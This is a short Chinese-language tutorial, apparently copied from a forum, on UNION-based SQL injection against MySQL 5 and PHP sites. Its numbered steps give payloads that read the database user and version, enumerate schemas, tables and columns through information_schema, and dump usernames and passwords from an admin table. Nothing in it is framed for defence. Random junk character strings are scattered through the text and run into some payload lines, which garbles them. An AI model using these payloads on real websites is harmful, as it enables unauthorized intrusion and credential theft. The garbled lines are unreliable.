* j- j1 r9 `8 ^$ Y教程内容:Mysql 5+php 注入+ Q8 R: w* L, I& }# ?4 @
5 a6 R3 j9 K, N5 l6 T
$ l, e' [1 K! ?) d! d& d) y& H2 V+ a/ ~
一.查看MYSQL基本信息(库名,版本,用户)
/ R7 V+ c$ N8 _- P* e8 H* H
1 b6 `1 C5 A: `& }- y2 R! x9 band 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
" Z/ `1 D G) K! }1 x* f3 x. c9 e1 N7 [& t# b! t5 n
二.查数据库
. e' }8 [/ g) i/ K5 E% M) m$ b# f9 i" `9 C8 F7 Z8 ]
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*% H" O" s$ v- z, r; z% k
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
$ L2 [+ l- ^8 }* W8 h ]! g& }& ]4 H4 D! t$ G
三.暴表7 [- U2 A- a7 f5 j2 w
4 v7 }2 ~. R# r; y" s" Pand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
6 L/ l H" ]9 M/ H; s. s) z, v- s
4 I3 u/ Y: M2 ?/ Tlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
* d) Y! b/ }9 P3 {( ^. b( {, `( C" P% b# {3 J+ ]
四.暴字段
4 a, n0 e$ x8 g. [
) u2 d' C* y) j+ |+ ^! c: qand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*2 u/ |( T M2 H6 q5 Z/ d
" \6 J0 I; b: ulimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
! d: g: N2 I1 s0 E4 B* B! C+ l& Y/ G$ h( }2 o- O
五.暴数据( e" c6 A9 r* a8 X
5 n, b8 S2 n ~7 Mand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*# m( a$ [4 r( f' J5 c
& l( s, U$ G" I5 I
9 O! a, a& A# y% G这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
$ F: l% J2 o9 Z4 o5 h |